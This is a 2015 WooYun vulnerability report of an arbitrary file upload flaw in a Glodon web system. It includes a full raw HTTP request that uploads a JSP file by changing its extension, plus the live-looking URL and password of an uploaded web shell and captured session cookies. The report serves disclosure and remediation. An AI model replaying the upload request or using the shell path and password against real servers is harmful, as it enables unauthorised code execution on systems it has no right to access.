当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162034

漏洞标题:广联达某系统漏洞打包可内网(任意文件上传&任意文件删除)

相关厂商:广联达软件股份有限公司

漏洞作者: 路人甲

提交时间:2015-12-17 11:13

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-17: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

漏洞打包可内网(任意文件上传&任意文件删除)

详细说明:

系统地址:http://zbj.glodon.com/homepage.html

QQ截图20151217091435.png


该漏洞需要注册登录
https://account.glodon.com/register?return_to=http://zbj.glodon.com

QQ截图20151217100158.png


注册成功后点击右上角你的邮箱

QQ截图20151217100257.png

漏洞证明:

QQ截图20151217100345.png


此处有个文件上传功能
上传后抓包改后缀

POST http://zbj.glodon.com/upload!upload.do?_gat=1&Hm_lvt_97b8467ff7ac7eb4f40dbecb5e56697e=1450315736&Hm_lpvt_3957fb8166a38239b57f22761e94950a=1450315302&functionId=1&pgv_si=s7863058432&JSESSIONID=F994E01A94AC0A39072E9C72B80C9469&userid=ff8080815185a2680151ad8c52b05ea8&Hm_lpvt_3cbb68532dffe94b23500a0f5604b471=1450315802&_ga=GA1.2.2100862631.1450314273&Hm_lvt_3cbb68532dffe94b23500a0f5604b471=1450315736&Hm_lvt_3957fb8166a38239b57f22761e94950a=1450315302&uploadType=1&glo_s=b1b2fabe-a090-4856-ad30-4a228f40b7f1&pgv_pvi=7013173248&IESESSION=alive&Hm_lpvt_97b8467ff7ac7eb4f40dbecb5e56697e=1450315802 HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------GI3ae0ae0KM7KM7Ef1KM7gL6GI3ei4
User-Agent: Shockwave Flash
Host: zbj.glodon.com
Content-Length: 414
Connection: Keep-Alive
Pragma: no-cache
Cookie: glo_s=b1b2fabe-a090-4856-ad30-4a228f40b7f1; pgv_si=s7863058432; Hm_lpvt_3957fb8166a38239b57f22761e94950a=1450315302; _ga=GA1.2.2100862631.1450314273; pgv_pvi=7013173248; Hm_lvt_3957fb8166a38239b57f22761e94950a=1450315302; JSESSIONID=F994E01A94AC0A39072E9C72B80C9469; IESESSION=alive; Hm_lvt_3cbb68532dffe94b23500a0f5604b471=1450315736; Hm_lpvt_3cbb68532dffe94b23500a0f5604b471=1450315964; Hm_lvt_97b8467ff7ac7eb4f40dbecb5e56697e=1450315736; Hm_lpvt_97b8467ff7ac7eb4f40dbecb5e56697e=1450315964
------------GI3ae0ae0KM7KM7Ef1KM7gL6GI3ei4
Content-Disposition: form-data; name="Filename"
01.jsp
------------GI3ae0ae0KM7KM7Ef1KM7gL6GI3ei4
Content-Disposition: form-data; name="Filedata"; filename="01.jsp"
Content-Type: application/octet-stream
test
------------GI3ae0ae0KM7KM7Ef1KM7gL6GI3ei4
Content-Disposition: form-data; name="Upload"
Submit Query
------------GI3ae0ae0KM7KM7Ef1KM7gL6GI3ei4--


QQ截图20151217100738.png


地址:http://zbj.glodon.com//images/ff8080815185a2680151ad928e7a5f93_1.jsp

QQ截图20151217101028.png


shell:
http://zbj.glodon.com/images/ff8080815185a2680151adb545e85fae_1.jsp?o=vLogin
密码:ninty

QQ截图20151217101431.png


QQ截图20151217101519.png


QQ截图20151217101602.png

修复方案:

删除shell,上传点过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-21 09:17

厂商回复:

感谢提交的漏洞,我们将尽快修复!已准备小礼物,还请留下联系方式,谢谢!

最新状态:

暂无

漏洞评价:

评价